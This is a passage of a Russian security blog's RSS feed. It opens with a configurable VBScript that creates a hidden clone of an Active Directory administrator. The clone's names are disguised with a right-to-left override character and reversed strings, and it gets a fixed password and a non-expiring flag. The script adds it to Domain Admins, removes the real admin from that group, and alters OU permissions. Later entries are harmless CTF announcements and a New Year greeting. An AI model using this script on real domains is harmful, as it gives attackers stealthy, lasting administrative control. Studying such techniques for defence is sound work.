&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Lec6xfCsIAw/TwsaKMK-onI/AAAAAAAABYM/Sgvfm5aapaE/s1600/m5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="386" src="http://2.bp.blogspot.com/-Lec6xfCsIAw/TwsaKMK-onI/AAAAAAAABYM/Sgvfm5aapaE/s640/m5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Ниже представлен сценарий, который автоматизирует все выше сказанное. Настраиваемые параметры:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;strAdminsamAccountName&lt;/b&gt; – идентификатор, который требуется с клонировать&lt;br /&gt;
&lt;b&gt;strAdminsGroup&lt;/b&gt; – привилегированная группа, в которую следует поместить клона&lt;br /&gt;
&lt;b&gt;strPassNewUser&lt;/b&gt; – задаваемый пароль новому пользователю&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="xml" name="code" rows="50"&gt;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; strAdminsamAccountName = "dmitry.ivanov"&amp;lt;br /&amp;gt; strAdminsGroup = "Domain Admins"&amp;lt;br /&amp;gt; strPassNewUser = "P@ssw0rd"&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; ' - - -&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Dim arrContainer(), i&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Set objRootDSE = GetObject("LDAP://RootDSE")&amp;lt;br /&amp;gt; strDomain = objRootDSE.Get("DefaultNamingContext")&amp;lt;br /&amp;gt; Set objDomain = GetObject("LDAP://" &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" &amp;amp; strAdminsamAccountName &amp;amp; "'")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; If Not IsNull(strAdminsamAccountNameDN) Then&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objAdmin = GetObject("LDAP://" &amp;amp; strAdminsamAccountNameDN)&amp;lt;br /&amp;gt;  Set objOU = GetObject(objAdmin.parent)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  i=0&amp;lt;br /&amp;gt;  Call EnumOUs(objOU)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  For j = i-1 To 0 Step -1&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;   if strContainer="" Then&amp;lt;br /&amp;gt;    strContainer = "OU=" &amp;amp; arrContainer(j) &amp;amp; strContainer&amp;lt;br /&amp;gt;    primaryContainer = strContainer&amp;lt;br /&amp;gt;   Else&amp;lt;br /&amp;gt;    strContainer = "OU=" &amp;amp; arrContainer(j) &amp;amp; "," &amp;amp; strContainer&amp;lt;br /&amp;gt;   End if&amp;lt;br /&amp;gt;   Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)&amp;lt;br /&amp;gt;   objOUcreate.SetInfo&amp;lt;br /&amp;gt;  Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objContainer = GetObject("LDAP://" &amp;amp; strContainer &amp;amp; "," &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objUserCreate = objContainer.Create("User", "cn=" &amp;amp; ChrW(8238) &amp;amp; StrReverse(objAdmin.displayName))&amp;lt;br /&amp;gt;  objUserCreate.Put "sAMAccountName", ChrW(8238) &amp;amp; StrReverse(strAdminsamAccountName)&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objUserCreate.SetPassword strPassNewUser&amp;lt;br /&amp;gt;  objUserCreate.Put "userAccountControl", 66048&amp;lt;br /&amp;gt;  objUserCreate.Put "givenName", ChrW(8238) &amp;amp; StrReverse(objAdmin.givenName)&amp;lt;br /&amp;gt;  objUserCreate.Put "sn", ChrW(8238) &amp;amp; StrReverse(objAdmin.sn)&amp;lt;br /&amp;gt;  objUserCreate.Put "initials", ChrW(8238) &amp;amp; StrReverse(objAdmin.initials)&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objUserCreate.Put "showInAdvancedViewOnly", "TRUE"&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  NewUserDN = "cn=" &amp;amp; ChrW(8238) &amp;amp; StrReverse(objAdmin.displayName) &amp;amp; "," &amp;amp; objContainer.distinguishedName&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" &amp;amp; strAdminsGroup &amp;amp; "'")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  If Not IsNull(strAdminsGroupDN) Then&amp;lt;br /&amp;gt;   Set objGroup = GetObject("LDAP://" &amp;amp; strAdminsGroupDN)&amp;lt;br /&amp;gt;   objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)&amp;lt;br /&amp;gt;   objGroup.SetInfo&amp;lt;br /&amp;gt;   objGroup.PutEx 3, "member", Array(NewUserDN)&amp;lt;br /&amp;gt;   objGroup.SetInfo&amp;lt;br /&amp;gt;  End If&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  OUAddAce(primaryContainer &amp;amp; "," &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; End If&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Function SearchDN(str)&amp;lt;br /&amp;gt;  Set objConnection = CreateObject("ADODB.Connection")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objConnection.Provider = "ADsDSOObject"&amp;lt;br /&amp;gt;  objConnection.Open "Active Directory Provider"&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objCommand = CreateObject("ADODB.Command")&amp;lt;br /&amp;gt;  Set objCommand.ActiveConnection = objConnection&amp;lt;br /&amp;gt;  objCommand.Properties("Searchscope") = 2&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" &amp;amp; strDomain &amp;amp; str&amp;lt;br /&amp;gt;  Set objRecordSet = objCommand.Execute&amp;lt;br /&amp;gt;  If Not objRecordSet.EOF Then&amp;lt;br /&amp;gt;   SearchDN = objRecordSet.Fields("distinguishedName").Value&amp;lt;br /&amp;gt;  End if&amp;lt;br /&amp;gt; End Function&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Sub EnumOUs(objChild)&amp;lt;br /&amp;gt;  Dim objParent&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objParent = GetObject(objChild.Parent)&amp;lt;br /&amp;gt;  If (objParent.Class = "organizationalUnit") Then&amp;lt;br /&amp;gt;   ReDim Preserve arrContainer(i + 1)&amp;lt;br /&amp;gt;   arrContainer(i) = objChild.ou&amp;lt;br /&amp;gt;   i=i+1&amp;lt;br /&amp;gt;   Call EnumOUs(objParent)&amp;lt;br /&amp;gt;  Else&amp;lt;br /&amp;gt;   ReDim Preserve arrContainer(i + 1)&amp;lt;br /&amp;gt;   arrContainer(i) = objChild.ou &amp;amp; ChrW(128)&amp;lt;br /&amp;gt;   i=i+1&amp;lt;br /&amp;gt;  End If&amp;lt;br /&amp;gt; End Sub&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Function OUAddAce(OU)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Dim objSdUtil, objSD, objDACL, objAce&amp;lt;br /&amp;gt;  Set objOU = GetObject ("LDAP://" &amp;amp; OU) &amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objSdUtil = GetObject(objOU.ADsPath)&amp;lt;br /&amp;gt;  Set objSD = objSdUtil.Get("ntSecurityDescriptor")&amp;lt;br /&amp;gt;  Set objDACL = objSD.DiscretionaryACL&amp;lt;br /&amp;gt;  Set objAce = CreateObject("AccessControlEntry")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objAce.Trustee = "Everyone"&amp;lt;br /&amp;gt;  objAce.AceFlags = 2&amp;lt;br /&amp;gt;  objAce.AceType = 6&amp;lt;br /&amp;gt;  objAce.AccessMask = 16&amp;lt;br /&amp;gt;  objAce.Flags = 1&amp;lt;br /&amp;gt;  objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"&amp;lt;br /&amp;gt;  objDacl.AddAce objAce&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objSD.DiscretionaryAcl = objDacl&amp;lt;br /&amp;gt;  objSDUtil.Put "ntSecurityDescriptor", Array(objSD)&amp;lt;br /&amp;gt;  objSDUtil.SetInfo&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")&amp;lt;br /&amp;gt;  intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control&amp;lt;br /&amp;gt;  intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &amp;amp;H1000&amp;lt;br /&amp;gt;  objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl&amp;lt;br /&amp;gt;  objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor&amp;lt;br /&amp;gt;  objOU.SetInfo&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; End Function&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6374246124939846207?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-10T12:33:33.403+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s72-c/m1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>С новым годом!!!</title><link>http://devteev.blogspot.com/2012/01/blog-post.html</link><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 03 Jan 2012 03:30:52 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2432163363029580288</guid><description>Поздравляю всех с уже наступившим Новым годом 2012! Желаю творческих успехов, удачи в этом году и, разумеется, больше позитива!!! :)&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe width="560" height="315" src="http://www.youtube.com/embed/phVdWG5nPI4" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2432163363029580288?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-03T15:30:52.653+04:00</app:edited><media:thumbnail url="http://img.youtube.com/vi/phVdWG5nPI4/default.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Подведение итогов PHDays CTF AfterParty 2011</title><link>http://devteev.blogspot.com/2011/12/phdays-ctf-afterparty-2011.html</link><category>CTF</category><category>HackQuest</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 27 Dec 2011 09:42:08 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7234282828438677928</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s1600/PHD+CTF+AfterParty+2011+kyprizel.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="140" src="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s200/PHD+CTF+AfterParty+2011+kyprizel.png" width="200" /&gt;&lt;/a&gt;Завершился двухнедельный конкурс по практической защите информации в рамках&amp;nbsp;&lt;a href="http://phday.ru/ctf_afterparty_rating.asp"&gt;PHDays CTF AfterParty 2011&lt;/a&gt;. Победителем соревнования стал участник под псевдонимом&amp;nbsp;&lt;a href="https://twitter.com/#!/kyprizel"&gt;kyprizel&lt;/a&gt;, набравший максимальное число очков из числа возможных. Респект и уважуха!!!&lt;br /&gt;
&lt;br /&gt;
В качестве приза он получит самую новую версию легендарного сканера безопасности &lt;a href="http://www.ptsecurity.ru/xs7.asp"&gt;XSpider 7.8&lt;/a&gt;&amp;nbsp;и приглашение на международный форум &lt;a href="http://phday.ru/"&gt;Positive Hack Days&lt;/a&gt; 2012 в качестве участника. Остальных победителей, а это участники, которые заняли 2-17 места на 25.12, ждут дипломы и подарки от организатора соревнований – компании &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt;.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Спасибо всем, кто принимал участие в соревнованиях&amp;nbsp;&lt;a href="http://phday.ru/ctf_quals.asp"&gt;CTF Quals&lt;/a&gt; и &lt;a href="http://phday.ru/ctf_afterparty.asp"&gt;CTF Afterparty&lt;/a&gt;! Я надеюсь участие в этих конкурсах принесло вам массу позитивных эмоций :) А для всех тех, кто не смог принять участие в этих конкурсах, но желал бы проверить свои хакерские способности, &lt;a href="http://phday.ru/smt.asp?gnum=1"&gt;регистрация&lt;/a&gt; и участие в&amp;nbsp;&lt;a href="http://phday.ru/ctf_afterparty_rating.asp"&gt;PHDays CTF AfterParty 2011&lt;/a&gt;&amp;nbsp;продлена до 20-го января 2012 года.&lt;br /&gt;
&lt;br /&gt;
И, разумеется, если Вам есть, что сказать, будем благодарны за объективную критику и общие отзывы об этих конкурсах.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-7234282828438677928?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-27T21:42:08.147+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s72-c/PHD+CTF+AfterParty+2011+kyprizel.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">16</thr:total></item><item><title>Positive Hack Days CTF 2012 (предварительный список команд)</title><link>http://devteev.blogspot.com/2011/12/positive-hack-days-ctf-2012.html</link><category>CTF</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 20 Dec 2011 02:25:44 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-123000528886179425</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Определился список команд, которые будут приглашены на соревнования по практической безопасности &lt;a href="http://phdays.ru/ctf_general.asp"&gt;Positive Hack Days CTF&lt;/a&gt; 2012. По результатам отборочных испытаний &lt;a href="http://phdays.ru/ctf_quals.asp"&gt;CTF Quals 2011&lt;/a&gt; приглашения получат следующие команды:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s1600/phdays_ctf_2012.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="141" src="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s200/phdays_ctf_2012.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;- eindbazen, Нидерланды&lt;br /&gt;
- leetmore, Россия&lt;br /&gt;
- int3pids, Испания&lt;br /&gt;
- HackerDom, Россия&lt;br /&gt;
- 0daysober, Франция&lt;br /&gt;
&lt;br /&gt;
(почему команда &lt;a href="https://rdot.org/forum/"&gt;rdot.org&lt;/a&gt; не примет участие в PHDays CTF 2012? Это большой большой секрет :))&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Личные приглашения получат следующие команды:&lt;br /&gt;
- Plaid Parliament of Pwning, США&lt;br /&gt;
- BIOS, Индия&lt;br /&gt;
- Shell-storm, Франция/Швейцария&lt;br /&gt;
- C.o.P, Франция&lt;br /&gt;
- IV, Россия&lt;br /&gt;
- FluxFingers, Германия&lt;br /&gt;
- HNG48, Япония&lt;br /&gt;
&lt;br /&gt;
Призовой  фонд CTF 2012 до конца не определен, но предполагается его увеличение;) &lt;br /&gt;
&lt;br /&gt;
P.S. Если найдутся желающие собрать 1-2 запасных команд (на случай форс мажора с основными командами), пишите на почту devteev@ptsecurity.ru.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-123000528886179425?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-20T14:25:44.520+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-87s6CB2KSdo/TvBiIoX86qI/AAAAAAAABXU/BzR3ZZ626hY/s72-c/phdays_ctf_2012.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><media:rating>nonadult</media:rating></channel></rss>

